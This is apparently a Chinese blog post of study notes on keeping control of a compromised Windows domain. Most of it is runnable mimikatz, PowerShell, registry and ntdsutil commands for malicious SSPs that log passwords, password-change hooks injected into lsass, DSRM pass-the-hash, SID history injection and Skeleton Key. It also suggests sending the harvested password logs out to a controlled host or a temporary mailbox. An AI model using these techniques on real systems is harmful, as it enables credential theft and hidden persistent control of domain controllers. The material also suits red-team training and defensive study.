首页 > 其他分享 >权限维持(二)

权限维持(二)

时间:2022-11-04 16:12:41浏览次数:79  
标签:DSRM god debug owa2010cn 权限 privilege 维持

参考资料:
https://www.cnblogs.com/lcxblogs/p/14216525.html

内网域-权限维持-基于验证DLL加载-SSP

方法一:但如果域控制器重启,被注入内存的伪造的SSP将会丢失。
privilege::debug
misc::memssp
C:\Windows\System32\mimilsa.log 记录登录的账号密码
方法二:使用此方法即使系统重启,也不会影响到持久化的效果。
1、mimilib.dll 传到目标域控的c:\windows\system32\目录下
2、修改注册表,重启生效
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
c:\windows\system32\kiwissp.log 记录账号密码文件
技术总结:
攻防实战中,靶机很难会重启,攻击者重启的话风险过大,
因此可以在靶机上把两个方法相互结合起来使用效果比较好,
尝试利用把生成的日志密码文件发送到内网被控机器或者临时邮箱。

内网域-权限维持-基于验证DLL加载-HOOK

https://github.com/wh0Nsq/HookPasswordChange
https://github.com/clymb3r/Misc-Windows-Hacking
方法一、
powershell
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
方法二、
powershell -exec bypass -Command "& {Import-Module 'C:\Invoke-ReflectivePEInjection.ps1';Invoke-ReflectivePEInjection -PEPath C:\HookPasswordChange.dll -procname lsass}"
报错解决:
powershell
Set-ExecutionPolicy
unrestricted

内网域-权限维持-基于机制账号启用-DSRM

1.获取dsrm及krbtgt的NTLM hash
privilege::debug
lsadump::lsa /patch /name:krbtgt
token::elevate
lsadump::sam
2.dsrm&krbtgt&NTLM hash同步
NTDSUTIL:打开ntdsutil
set DSRM password:修改DSRM的密码
sync from domain account 域用户名字:使DSRM的密码和指定域用户的密码同步
q(第1次):退出DSRM密码设置模式
q(第2次):退出ntdsutil
3.修改dsrm登录方式
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD
4.利用PTH传递攻击
privilege::debug
sekurlsa::pth /domain:owa2010cn-god /user:administrator /ntlm:b097d7ed97495408e1537f706c357fc5
dir \owa2010cn-god\c$
技术总结:
利用系统自带机制模式DSRM,修改DSRM默认登录方式和属性,通过其同步krgtgt进行PTH攻击,实现持续化控制,但适用于系统=>windows server2008。每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。

内网域-权限维持-基于用户属性修改-SID history

1、获取某用户SID属性:
Import-Module ActiveDirectory
Get-ADUser webadmin -Properties sidhistory
2、给予某用户administrator属性:
privilege::debug
sid::patch
sid::add /sam:webadmin /new:administrator
3、测评给与前后的DC访问权限:
dir \192.168.3.21\c$
技术总结:
把域控管理员的SID加入到 其他某个 恶意的域账户的SID History中,然后,这个恶意的(我们自己创建的)域账户就可以域管理员权限访问域控了,不修改域账户一直存在。

内网域-权限维持-基于登录进程劫持-Skeleton Key

1、测试域内某个用户与DC通讯
dir \owa2010cn-god\c$
2、连接DC后,DC注入lsass进程
net use \192.168.3.21\ipc$ "Admin12345" /user:god\administrator
mimikatz:
privilege::debug
misc::skeleton
3、重新测试域内某个用户与DC通讯
net use \owa2010cn-god\ipc$ "mimikatz" /user:god\administrator
dir \owa2010cn-god\c$
技术总结:
因为Skeleton Key技术是被注入到lsass.exe进程的,
所以它只存在内存中,如域控重启,万能密码将失效。

标签:DSRM,god,debug,owa2010cn,权限,privilege,维持
From: https://www.cnblogs.com/rayob1/p/16858181.html

相关文章

  • 学习笔记-角色权限
    角色权限用户帐户在Windowsvista或是windows7中,有两个级别的用户:标准用户和管理员.标准用户是计算机Users组的成员;管理员是计算机Administrators组的成员......
  • SQL SERVER 中 sys.dm_tran_locks 消息 297,级别 16,状态 1,第 6 行 用户没有执行此操
     SQLSERVER中 sys.dm_tran_locks 消息297,级别16,状态1,第6行用户没有执行此操作的权限。--1.查询数据库阻塞与死锁的进程清单(可分析清单详情,看看死锁id对应的......
  • k8s结合jumpserver做kubectl权限控制 用户在多个namespaces的访问权限 rbac权限控制
    k8s结合jumpserver做kubectl权限控制用户在多个namespaces的访问权限rbac权限控制 https://www.cnblogs.com/fanfanfanlichun/p/14989454.html  其实这个文章就......
  • Vue要做权限管理
    一、是什么权限是对特定资源的访问许可,所谓权限控制,也就是确保用户只能访问到被分配的资源而前端权限归根结底是请求的发起权,请求的发起可能有下面两种形式触发页面加......
  • Linux下的mount的权限问题
    Linux下的mount的权限问题最近在挂载的时候经常遇到挂载过后仅有root用户可以修改的问题原挂载命令:sudomount/dev/nvme0n1p5/home/lemon233/code发现code目录归r......
  • centos7中为普通用户添加sudo权限
    可以通过visudo命令。这样我们修改不对的地方,它会给与提示,防止修改错误。visudo后,找到如下行:##Allowroottorunanycommandsanywhere#使用者账号登陆者的来源主......
  • 用户与权限管理
    用户与权限管理1.用户管理Mysql用户可分为普通用户和root用户。root用户拥有所有的权限,包括创建用户,删除用户和修改用户的密码等管理权限;普通用户只拥有被授予的各种权限......
  • SAP ABAP SM30 权限校验 新增、修改
    1、用户输入t-code后只展示有公司代码权限的数据 1LOOPATextract.2DATA(lv_tabix)=sy-tabix.3PERFORMauth_bukrsUSINGview_action.4IFsy-subrc......
  • 【Java编程思想读书笔记】第五章(补充):静态初始化与枚举类型+第六章:访问权限控制
    参考书目:《Java编程思想》(第四版)友链:​​【读书笔记】Java重要知识点整理与汇总​​一、静态初始化:结论:静态初始化执行且仅执行一次(当首次生成这个类的一个对象时,或首次访......
  • Android中拨打电话的权限名
    在学习《第一行代码》(第三版)的8.8.2小节中,有一个RuntimePermissionTest项目,这个项目用于学习运行时权限的使用方法,其中书上的部分代码如下:classMainActivity:AppCompat......